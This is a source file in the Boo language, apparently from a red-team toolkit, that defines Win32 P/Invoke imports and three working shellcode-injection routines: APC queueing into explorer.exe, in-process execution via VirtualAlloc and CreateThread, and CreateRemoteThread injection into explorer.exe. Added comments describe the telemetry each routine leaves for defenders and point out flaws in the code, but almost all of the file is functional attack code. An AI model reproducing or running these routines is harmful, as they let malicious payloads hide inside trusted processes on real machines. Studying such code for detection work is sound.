import System.Runtime.InteropServices
from System.Diagnostics import Process
from System import IntPtr
/*
Author: Marcello Salvati (@byt3bl33d3r)
License: BSD 3-Clause
This Boolang source file can be run directly with the booi.exe interpreter or using the embedded compiler in runBoo.cs/Invoke-JumpScare.ps1
References:
- https://github.com/boo-lang/boo/wiki/Scripting-with-the-Boo.Lang.Compiler-API
- https://github.com/boo-lang/boo/wiki/Invoke-Native-Methods-with-DllImport
- https://github.com/pwndizzle/c-sharp-memory-injection
*/
# Win32 P/Invoke declarations plus three shellcode-injection routines:
# APC queueing into explorer.exe, in-process execution, and
# CreateRemoteThread into explorer.exe.
#
# Defender's view: every routine below emits the classic injection telemetry
# that EDR / ETW-based detections key on -- a handle opened on another
# process, a private executable (RWX or RX) allocation, a cross-process
# memory write, and a thread or APC whose start address lies outside any
# loaded module. None of the routines closes the handles it opens.
class Inject:
    # --- kernel32 imports -------------------------------------------------
    # Handles and pointers are declared as int throughout; NOTE(review): that
    # assumes a 32-bit process -- confirm against the host the script runs in.

    # Opens a handle to another process with the given access mask.
    [DllImport("kernel32.dll")]
    def OpenProcess(dwDesiredAccess as int, bInheritHandle as bool, dwProcessID as int) as int:
        pass

    # Reserves/commits memory in another process. Parameter names here were
    # copied from VirtualProtectEx; positionally the 4th and 5th arguments are
    # VirtualAllocEx's flAllocationType and flProtect (see the call sites,
    # which pass MEM_COMMIT and PAGE_EXECUTE_READWRITE).
    [DllImport("kernel32.dll")]
    def VirtualAllocEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as int:
        pass

    # Changes page protection in another process.
    [DllImport("kernel32.dll")]
    def VirtualProtectEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as bool:
        pass

    # Copies a byte buffer into another process's address space.
    [DllImport("kernel32.dll")]
    def WriteProcessMemory(hProcess as int, lpBaseAddress as int, lpBuffer as (byte), nSize as int, lpNumberOfBytesWritten as int) as bool:
        pass

    # Opens a handle to an existing thread by id.
    [DllImport("kernel32.dll")]
    def OpenThread(dwDesiredAccess as int, bInheritHandle as bool, dwThreadId as int) as int:
        pass

    # Queues a user-mode APC (pfnAPC) on the given thread.
    [DllImport("kernel32.dll")]
    def QueueUserAPC(pfnAPC as int, hThread as int, dwData as int) as int:
        pass

    # Allocates memory in the current process.
    [DllImport("kernel32.dll")]
    def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as uint, flProtect as uint) as int:
        pass

    # Creates a thread in the current process at lpStartAddress.
    [DllImport("kernel32.dll")]
    def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
        pass

    # Creates a thread in another process at lpStartAddress.
    [DllImport("kernel32.dll")]
    def CreateRemoteThread(hProcess as int, lpThreadAttributes as int, dwStackSize as uint, lpStartAddress as int, lpParameter as int, dwCreationFlags as uint, lpThreadId as int) as int:
        pass

    # Blocks until the handle is signalled or the timeout elapses.
    [DllImport("kernel32.dll")]
    def WaitForSingleObject(hHandle as int, dwMilliseconds as long):
        pass

    # --- injection routines -----------------------------------------------

    # Queues `sc` as an APC on every thread of the first explorer.exe process.
    # NOTE(review): a queued user APC only runs when its thread next enters an
    # alertable wait (general Win32 behaviour, not visible in this code).
    #
    # Observable artefacts: OpenProcess on explorer.exe with VM_OPERATION |
    # VM_WRITE | VM_READ, an RWX VirtualAllocEx later flipped to RX, a
    # WriteProcessMemory into that region, and one OpenThread/QueueUserAPC
    # pair per target thread, each naming an address outside any module.
    #
    # Parameters:
    #   sc - raw shellcode bytes to copy into the target.
    # Raises IndexOutOfRangeException when no explorer.exe process exists
    # (the [0] index below).
    public static def InjectQueueUserAPC(sc as (byte)):
        # Process Privileges (Win32 process access rights)
        PROCESS_VM_OPERATION = 0x0008 cast int
        PROCESS_VM_WRITE = 0x0020 cast int
        PROCESS_VM_READ = 0x0010 cast int

        # Memory Permissions (VirtualAllocEx / VirtualProtectEx flags)
        MEM_COMMIT = 0x1000 cast uint
        PAGE_EXECUTE_READWRITE = 0x40 cast uint
        PAGE_EXECUTE_READ = 0x20 cast uint

        # Thread Permissions (thread access rights combined into THREAD_HIJACK)
        SUSPEND_RESUME = (0x0002) cast int
        GET_CONTEXT = (0x0008) cast int
        SET_CONTEXT = (0x0010) cast int
        THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT

        # First matching process only; the match is by image name.
        targetProcess = Process.GetProcessesByName("explorer")[0]

        procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id)
        print "procHandle = $procHandle"

        # Allocate an RWX region sized to the payload, then write it.
        resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        print "resultPtr = $resultPtr"

        bytesWritten as int = 0;
        resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
        print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"

        # Drop the region to RX before queuing the APC; the printed values are
        # diagnostics only.
        oldProtect as uint = 0
        resultBool = VirtualProtectEx(procHandle cast IntPtr, resultPtr cast IntPtr, sc.Length, PAGE_EXECUTE_READ, oldProtect)
        print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"

        # Every thread of the target gets the APC, not just one.
        for thread in targetProcess.Threads:
            tHandle = OpenThread(THREAD_HIJACK, false, thread.Id cast int)
            print "tHandle = $tHandle"

            ptr = QueueUserAPC(resultPtr cast IntPtr, tHandle, 0)
            print "QueueUserAPC = $ptr"

        print "Injected"

    # Runs `sc` inside the current process: RWX VirtualAlloc, Marshal.Copy of
    # the bytes, CreateThread at the allocation, then an indefinite wait
    # (0xFFFFFFFF == INFINITE) on that thread.
    #
    # Observable artefacts: a private RWX region in the interpreter's own
    # process and a thread whose start address is not backed by any module.
    #
    # Parameters:
    #   sc - raw shellcode bytes to execute.
    public static def InjectSelf(sc as (byte)):
        MEM_COMMIT = 0x1000 cast uint
        PAGE_EXECUTE_READWRITE = 0x40 cast uint

        # Only referenced by the commented-out VirtualProtectEx call below.
        currentProcess = Process.GetCurrentProcess()
        threadId = 0
        pinfo = 0

        funcAddr = VirtualAlloc(0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        print "funcAddr = $funcAddr"

        # Direct copy into our own address space; no cross-process write here.
        Marshal.Copy(sc, 0 , funcAddr cast IntPtr, sc.Length)

        //oldProtect as uint = 0
        //resultBool = VirtualProtectEx(currentProcess.Handle cast IntPtr, funcAddr cast IntPtr, sc.Length, PAGE_EXECUTE_READWRITE, oldProtect)
        //print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"

        hThread = CreateThread(0, 0, funcAddr, pinfo, 0 ,threadId)
        print "hThread = $hThread"

        # Blocks the caller until the shellcode thread exits (INFINITE timeout).
        WaitForSingleObject(hThread, 0xFFFFFFFF)
        print "Injected"

    # Classic remote-thread injection into the first explorer.exe process:
    # OpenProcess with a full-access mask, RWX VirtualAllocEx,
    # WriteProcessMemory, CreateRemoteThread. Unlike InjectQueueUserAPC the
    # region is left RWX, and the new thread is neither waited on nor closed.
    #
    # Observable artefacts: a full-access handle to explorer.exe, a private
    # RWX region in it, a cross-process write, and a remote thread starting
    # at an address outside any loaded module -- each a high-signal event.
    #
    # Parameters:
    #   sc - raw shellcode bytes to copy into the target.
    # Raises IndexOutOfRangeException when no explorer.exe process exists
    # (the [0] index below).
    public static def InjectRemote(sc as (byte)):
        # Process Privileges (Win32 process access rights)
        PROCESS_VM_OPERATION = 0x0008 cast int
        PROCESS_VM_WRITE = 0x0020 cast int
        PROCESS_VM_READ = 0x0010 cast int
        PROCESS_ALL = 0x1F0FFF cast int

        # Memory Permissions (VirtualAllocEx flags)
        MEM_COMMIT = 0x1000 cast uint
        PAGE_EXECUTE_READWRITE = 0x40 cast uint

        # First matching process only; the match is by image name.
        targetProcess = Process.GetProcessesByName("explorer")[0]

        # Note the broad mask: only PROCESS_ALL is actually used here; the
        # narrower VM_* constants above are declared but unused.
        procHandle = OpenProcess(PROCESS_ALL, false, targetProcess.Id)
        print "procHandle = $procHandle"

        resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        print "resultPtr = $resultPtr"

        bytesWritten as int = 0;
        resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
        print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"

        # Fire-and-forget: the returned thread handle is discarded.
        CreateRemoteThread(procHandle cast IntPtr, 0, 0, resultPtr cast IntPtr, 0, 0, 0)
        print "Injected"